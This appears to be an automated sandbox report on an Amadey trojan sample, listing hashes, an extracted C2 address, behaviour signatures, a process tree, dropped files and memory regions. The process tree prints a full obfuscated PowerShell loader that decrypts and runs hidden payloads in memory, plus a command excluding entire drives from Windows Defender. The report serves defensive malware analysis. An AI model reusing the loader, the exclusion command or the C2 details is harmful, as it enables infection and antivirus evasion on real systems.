Analysis

  • max time kernel
    201s
  • max time network
    213s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    26-01-2024 19:03

General

  • Target

    2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe

  • Size

    4.5MB

  • MD5

    37bb6dd5e4a0d91aef18c328fee94f89

  • SHA1

    72c55abc1527c898153631f1e1233c48440d4ddd

  • SHA256

    9571aa429ecf266de879d8a0e207e4240263e6031adc65293fce003fc8316b57

  • SHA512

    693a47726692bf6853cc1da84bdb9a72c9fba9167c58ad79cf02df67be4993b9575287de5fe0221349e2be39c83d7d1cec00e4bb445a26ddf1726f9da3feb7da

  • SSDEEP

    98304:ZfPdaLQlaZm8vWMTEGky215OS870Bh8/eSKl:ZfP8caA8vWYEGkKS870Bh8/eP

Malware Config

Extracted

Family

amadey

Version

4.15

C2

http://185.172.128.63

Attributes
  • install_dir

    6187fcb526

  • install_file

    Dctooux.exe

  • strings_key

    cd3b2619c9009c441355ae581d53163e

  • url_paths

    /v8sjh3hs8/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe
    "C:\Users\Admin\AppData\Local\Temp\2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3264
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      2⤵
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3560
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4912
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1332
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd';$RfUL='SplstIeistIetstIe'.Replace('stIe', ''),'TrfmgKafmgKnfmgKsfmgKfofmgKrfmgKmFfmgKinafmgKlBfmgKlofmgKckfmgK'.Replace('fmgK', ''),'DecHsSjomHsSjpHsSjrHsSjessHsSj'.Replace('HsSj', ''),'EleBZnKmBZnKeBZnKntBZnKAtBZnK'.Replace('BZnK', ''),'ReGrwradGrwrLiGrwrnGrwreGrwrsGrwr'.Replace('Grwr', ''),'CIOLbopIOLbyIOLbTIOLboIOLb'.Replace('IOLb', ''),'FrpwLNompwLNBapwLNspwLNepwLN6pwLN4SpwLNtpwLNripwLNnpwLNgpwLN'.Replace('pwLN', ''),'LZaAAoZaAAaZaAAdZaAA'.Replace('ZaAA', ''),'IswsYnswsYvokswsYeswsY'.Replace('swsY', ''),'MayHpwinyHpwMoyHpwduyHpwleyHpw'.Replace('yHpw', ''),'EnfcpnnfcptrynfcpPnfcponfcpinnfcptnfcp'.Replace('nfcp', ''),'GKVjZetCKVjZurKVjZrKVjZenKVjZtPrKVjZocKVjZessKVjZ'.Replace('KVjZ', ''),'CmmRYhanmmRYgmmRYeExmmRYtenmmRYsmmRYimmRYonmmRY'.Replace('mmRY', ''),'CrewBkzatwBkzeDwBkzecwBkzrywBkzptwBkzowBkzrwBkz'.Replace('wBkz', '');powershell -w hidden;function HYZRs($YjbML){$FKFbd=[System.Security.Cryptography.Aes]::Create();$FKFbd.Mode=[System.Security.Cryptography.CipherMode]::CBC;$FKFbd.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$FKFbd.Key=[System.Convert]::($RfUL[6])('2M0fT7QfMAGeiJeE2Y8HU5skhkMH0OcAFA0SFzRHVws=');$FKFbd.IV=[System.Convert]::($RfUL[6])('Wv0CCTjoJ02lflet8TKTGg==');$qvWHS=$FKFbd.($RfUL[13])();$UQnTy=$qvWHS.($RfUL[1])($YjbML,0,$YjbML.Length);$qvWHS.Dispose();$FKFbd.Dispose();$UQnTy;}function tsjtk($YjbML){$KLabx=New-Object System.IO.MemoryStream(,$YjbML);$CeqVN=New-Object System.IO.MemoryStream;$OFOrH=New-Object System.IO.Compression.GZipStream($KLabx,[IO.Compression.CompressionMode]::($RfUL[2]));$OFOrH.($RfUL[5])($CeqVN);$OFOrH.Dispose();$KLabx.Dispose();$CeqVN.Dispose();$CeqVN.ToArray();}$xZSiw=[System.IO.File]::($RfUL[4])([Console]::Title);$VwJSg=tsjtk (HYZRs ([Convert]::($RfUL[6])([System.Linq.Enumerable]::($RfUL[3])($xZSiw, 5).Substring(2))));$NGyKN=tsjtk (HYZRs ([Convert]::($RfUL[6])([System.Linq.Enumerable]::($RfUL[3])($xZSiw, 6).Substring(2))));[System.Reflection.Assembly]::($RfUL[7])([byte[]]$NGyKN).($RfUL[10]).($RfUL[8])($null,$null);[System.Reflection.Assembly]::($RfUL[7])([byte[]]$VwJSg).($RfUL[10]).($RfUL[8])($null,$null); "
            5⤵
              PID:4712
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:652
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1128
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2140
              • C:\Users\Admin\AppData\Local\Temp\sz1kof4m.5gq.exe
                "C:\Users\Admin\AppData\Local\Temp\sz1kof4m.5gq.exe"
                6⤵
                • Executes dropped EXE
                PID:4176
        • C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe
          "C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Launches sc.exe
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:924
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\SysWOW64\cmd.exe
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:2800
            • C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe
              C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe
              5⤵
              • Loads dropped DLL
              • Launches sc.exe
              PID:1344
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 1108
        2⤵
        • Program crash
        PID:4928

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      1KB

      MD5

      e8d18d7e22c42d18a1f6936abc4f1e60

      SHA1

      93c687f2262749d2d034ff2eca8bc5e16572e399

      SHA256

      84f0c3dcb3e1e9e89709ccd9e2cea0650d853d5d614261efe86b936ce32ef89d

      SHA512

      defd96160752db39593eefe1931555e77406ae7bb8d5d87d0355f59b9772763cc94534cbea9e9e2cb58a6632232980e0202651cc5d1e22d1276bc830734d4cc8

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

      Filesize

      18KB

      MD5

      5349439b5cf62d0014a2aa64b2b7dd03

      SHA1

      0fa6b509480f34af04bffc2ebb448f339d25a801

      SHA256

      886764c880fe790bdf534393cf67280cc7fb6b06dd01e43a2b33ca2789f353a3

      SHA512

      3649f711406a26e6d45b92f3a8462401ac4398876d24eb004523340446d98f6e2dc1184aa64fa73967582dc9609629ec027acb6433bdb5ca38f949e44ed5ea80

    • C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd

      Filesize

      229KB

      MD5

      4c2a5540e7e7adb88c94df8e1967c468

      SHA1

      979725fcb62a3492d7dbd3bfdc75e51087dc677b

      SHA256

      9e9a0c51690263b2ff0f61f96a684725df65eb0ef8cf6fdcf400814f7634dfd1

      SHA512

      7a964e6b10260854b18f4aa3af09e52d4a992bb4f7066f7e51b268696e8be5d405cce1e9dd392e70c2f321072a263dd9511d1c71cdf660449d786ec9c4bd3861

    • C:\Users\Admin\AppData\Local\Temp\1001035001\sc.exe

      Filesize

      72KB

      MD5

      4e7c21e82a81ebb852fbd1d5dce0b95b

      SHA1

      b163eb8a73bea927cb2fff375214dce36db410df

      SHA256

      140da189371f0c1d695737963787bc4ef64dd1addffdeacd3e53c46c4e515070

      SHA512

      32c1add1b646398955d93a1dc6c0a2f20df921f2ea00672007c074f0556f3030dd524aa497187dd9c996466ac52963deb27753cdc40b0442d97087ff183a836d

    • C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe

      Filesize

      1.4MB

      MD5

      9e1d9449d92d69c51a605225410f46f9

      SHA1

      f6e4d110f48bb4264097dd3101ef791f2c3d01b0

      SHA256

      c5e71ca1dcfe7975449a25d339036f3720b0b72aa52d8794b024442216487a4d

      SHA512

      000904eeacc9cc086a9f666dc8cca356e4d1a0ec0fc79dd9032c1b37399a8d75585d4a9b874ca161a38675afe69fceb817482afba75f0e09fc11169fdf16227c

    • C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe

      Filesize

      851KB

      MD5

      ffede82d4a814bfef83fc66390efa5d5

      SHA1

      17629f344c63e8eb6fd52f68c2298f60d7b85bfd

      SHA256

      f61f8f423d7c5b41eec88dad28dae97f3b13d05b86e799ecedbd9679c783a0f0

      SHA512

      752910235f9747282124bf75233971d5e5d7e6e7758e56688352dcbd1fbccd3118dd39a85aa6fcd1733a8510d7bff6dc935d3b736c28b8f4447a4bf38cd35688

    • C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe

      Filesize

      992KB

      MD5

      7f9f22a49e6a6a5d76a9afbe00218f20

      SHA1

      e6c9b9240315a006043a913025d93eab2d2376b6

      SHA256

      4afe2196ae4ca84126633e54ce595b56c71533d175580e8267f71c05f5bb5136

      SHA512

      aca202fc101b935a4092033d1fcd1b5b2edb0631ceb49d44094a59dbd4a7adc360d28459b92e5c1dd1d52e95b3b46db5c5b15cbadcfa4a180622ac236fac5009

    • C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe

      Filesize

      847KB

      MD5

      76d7ccdbe9441835833d88a5d75b4ccf

      SHA1

      e66782fa63e4c09f6a7842271e2a3e4d4a8b919e

      SHA256

      22f9a5fc8af92964e5b5868fffa966d603abf14e762726927fe67025cf175e3e

      SHA512

      5cf3dcef34bdaf99be2e9f9173600fc758383cd662f1ce30985a6acc22a6bfff0c7a2601547bec432bf2b231831270fbea6832df10b3b3f2910e9793817c5915

    • C:\Users\Admin\AppData\Local\Temp\5af725f3

      Filesize

      1004KB

      MD5

      2aceec38701258523827ea93b1ed77b9

      SHA1

      4af7c3bc2c8fa42ac60ed47baf188727e3611ba9

      SHA256

      668a92877a4d3590d8e6c384a1595627df2cf9ba4ef752d201acc7b0fd920bb3

      SHA512

      55940b65f96e8ab97b7aeb5417d647114f4818ca678c4e2164338c204731579338475dbe6a433718fa8bd2800761305505faf2cd33240e87c125628af797161a

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5qfqaru3.x10.ps1

      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    • C:\Users\Admin\AppData\Local\Temp\sz1kof4m.5gq.exe

      Filesize

      3KB

      MD5

      bc665c443936ecbaccac579b2e336c09

      SHA1

      0ec27635b26a2a311568824be2bcad09e0ccd027

      SHA256

      1b5b29a86fbab96326253ed97583e699dd7476907418f018486c1abb4ec3aec2

      SHA512

      2fee1859a5457d7d7230762eeb23d27db40223fdf793b09e9e704df34c6e4899b60d592c7026219582cd51c431a424eb040937c0ea033d27d9ecec8a630d336f

    • memory/652-117-0x0000000009440000-0x00000000094B6000-memory.dmp

      Filesize

      472KB

    • memory/652-220-0x000000000B2C0000-0x000000000B2EE000-memory.dmp

      Filesize

      184KB

    • memory/652-208-0x000000000B010000-0x000000000B02A000-memory.dmp

      Filesize

      104KB

    • memory/652-207-0x000000000B690000-0x000000000BD08000-memory.dmp

      Filesize

      6.5MB

    • memory/652-202-0x0000000006FB0000-0x0000000006FC0000-memory.dmp

      Filesize

      64KB

    • memory/652-52-0x0000000007DE0000-0x0000000008130000-memory.dmp

      Filesize

      3.3MB

    • memory/652-251-0x0000000006FB0000-0x0000000006FC0000-memory.dmp

      Filesize

      64KB

    • memory/652-217-0x00000000779E1000-0x0000000077AF4000-memory.dmp

      Filesize

      1.1MB

    • memory/652-230-0x0000000073A30000-0x000000007411E000-memory.dmp

      Filesize

      6.9MB

    • memory/652-86-0x0000000009380000-0x00000000093BC000-memory.dmp

      Filesize

      240KB

    • memory/652-219-0x0000000075A70000-0x0000000075B40000-memory.dmp

      Filesize

      832KB

    • memory/652-210-0x000000000B040000-0x000000000B04A000-memory.dmp

      Filesize

      40KB

    • memory/652-233-0x0000000006FB0000-0x0000000006FC0000-memory.dmp

      Filesize

      64KB

    • memory/652-54-0x0000000008710000-0x000000000875B000-memory.dmp

      Filesize

      300KB

    • memory/652-53-0x00000000081A0000-0x00000000081BC000-memory.dmp

      Filesize

      112KB

    • memory/652-40-0x0000000073A30000-0x000000007411E000-memory.dmp

      Filesize

      6.9MB

    • memory/652-39-0x0000000004A00000-0x0000000004A36000-memory.dmp

      Filesize

      216KB

    • memory/652-41-0x0000000006FB0000-0x0000000006FC0000-memory.dmp

      Filesize

      64KB

    • memory/652-42-0x0000000006FB0000-0x0000000006FC0000-memory.dmp

      Filesize

      64KB

    • memory/652-43-0x00000000075F0000-0x0000000007C18000-memory.dmp

      Filesize

      6.2MB

    • memory/652-44-0x0000000007400000-0x0000000007422000-memory.dmp

      Filesize

      136KB

    • memory/652-47-0x0000000007D00000-0x0000000007D66000-memory.dmp

      Filesize

      408KB

    • memory/652-48-0x0000000007C20000-0x0000000007C86000-memory.dmp

      Filesize

      408KB

    • memory/924-131-0x00007FF797D00000-0x00007FF797E5F000-memory.dmp

      Filesize

      1.4MB

    • memory/924-333-0x00007FFE17C30000-0x00007FFE17D9A000-memory.dmp

      Filesize

      1.4MB

    • memory/924-139-0x00007FFE17C30000-0x00007FFE17D9A000-memory.dmp

      Filesize

      1.4MB

    • memory/924-134-0x00007FFE17C30000-0x00007FFE17D9A000-memory.dmp

      Filesize

      1.4MB

    • memory/1128-144-0x00000000051F0000-0x0000000005200000-memory.dmp

      Filesize

      64KB

    • memory/1128-195-0x00000000051F0000-0x0000000005200000-memory.dmp

      Filesize

      64KB

    • memory/1128-199-0x0000000073A30000-0x000000007411E000-memory.dmp

      Filesize

      6.9MB

    • memory/1128-140-0x00000000051F0000-0x0000000005200000-memory.dmp

      Filesize

      64KB

    • memory/1128-138-0x0000000073A30000-0x000000007411E000-memory.dmp

      Filesize

      6.9MB

    • memory/1344-504-0x00007FF708BB0000-0x00007FF708C0A000-memory.dmp

      Filesize

      360KB

    • memory/1344-502-0x00007FF708BB0000-0x00007FF708C0A000-memory.dmp

      Filesize

      360KB

    • memory/2140-253-0x000000007F3D0000-0x000000007F3E0000-memory.dmp

      Filesize

      64KB

    • memory/2140-252-0x0000000009650000-0x0000000009683000-memory.dmp

      Filesize

      204KB

    • memory/2140-231-0x0000000073A30000-0x000000007411E000-memory.dmp

      Filesize

      6.9MB

    • memory/2140-234-0x0000000007320000-0x0000000007330000-memory.dmp

      Filesize

      64KB

    • memory/2140-254-0x000000006EA50000-0x000000006EA9B000-memory.dmp

      Filesize

      300KB

    • memory/2140-232-0x0000000007320000-0x0000000007330000-memory.dmp

      Filesize

      64KB

    • memory/2140-255-0x0000000009630000-0x000000000964E000-memory.dmp

      Filesize

      120KB

    • memory/2140-260-0x00000000099B0000-0x0000000009A55000-memory.dmp

      Filesize

      660KB

    • memory/2140-261-0x0000000007320000-0x0000000007330000-memory.dmp

      Filesize

      64KB

    • memory/2800-492-0x00007FFE26460000-0x00007FFE2663B000-memory.dmp

      Filesize

      1.9MB

    • memory/2800-497-0x00000000700E0000-0x000000007025B000-memory.dmp

      Filesize

      1.5MB

    • memory/3264-16-0x0000000007390000-0x0000000007490000-memory.dmp

      Filesize

      1024KB

    • memory/3264-136-0x00000000058B0000-0x00000000058C0000-memory.dmp

      Filesize

      64KB

    • memory/3264-142-0x00000000058B0000-0x00000000058C0000-memory.dmp

      Filesize

      64KB

    • memory/3264-141-0x00000000058B0000-0x00000000058C0000-memory.dmp

      Filesize

      64KB

    • memory/3264-200-0x0000000007390000-0x0000000007490000-memory.dmp

      Filesize

      1024KB

    • memory/3264-15-0x0000000007390000-0x0000000007490000-memory.dmp

      Filesize

      1024KB

    • memory/3264-201-0x0000000007390000-0x0000000007490000-memory.dmp

      Filesize

      1024KB

    • memory/3264-14-0x0000000007390000-0x0000000007490000-memory.dmp

      Filesize

      1024KB

    • memory/3264-13-0x00000000058B0000-0x00000000058C0000-memory.dmp

      Filesize

      64KB

    • memory/3264-209-0x0000000073A30000-0x000000007411E000-memory.dmp

      Filesize

      6.9MB

    • memory/3264-12-0x00000000058B0000-0x00000000058C0000-memory.dmp

      Filesize

      64KB

    • memory/3264-11-0x00000000058A0000-0x00000000058B0000-memory.dmp

      Filesize

      64KB

    • memory/3264-10-0x00000000058B0000-0x00000000058C0000-memory.dmp

      Filesize

      64KB

    • memory/3264-9-0x00000000058B0000-0x00000000058C0000-memory.dmp

      Filesize

      64KB

    • memory/3264-8-0x00000000058B0000-0x00000000058C0000-memory.dmp

      Filesize

      64KB

    • memory/3264-7-0x00000000058B0000-0x00000000058C0000-memory.dmp

      Filesize

      64KB

    • memory/3264-6-0x0000000006F10000-0x00000000070A2000-memory.dmp

      Filesize

      1.6MB

    • memory/3264-143-0x00000000058B0000-0x00000000058C0000-memory.dmp

      Filesize

      64KB

    • memory/3264-1-0x0000000000A90000-0x0000000000F12000-memory.dmp

      Filesize

      4.5MB

    • memory/3264-0-0x0000000073A30000-0x000000007411E000-memory.dmp

      Filesize

      6.9MB

    • memory/3264-5-0x0000000005BC0000-0x0000000005DD6000-memory.dmp

      Filesize

      2.1MB

    • memory/3264-2-0x0000000005760000-0x00000000057FC000-memory.dmp

      Filesize

      624KB

    • memory/3264-3-0x0000000073A30000-0x000000007411E000-memory.dmp

      Filesize

      6.9MB

    • memory/3264-4-0x00000000058B0000-0x00000000058C0000-memory.dmp

      Filesize

      64KB

    • memory/3264-20-0x0000000007AE0000-0x0000000007FDE000-memory.dmp

      Filesize

      5.0MB

    • memory/3560-18-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/3560-19-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/3560-21-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/3560-127-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/3560-17-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/3560-132-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/3560-67-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/3560-63-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/3560-35-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/3560-22-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/3560-32-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB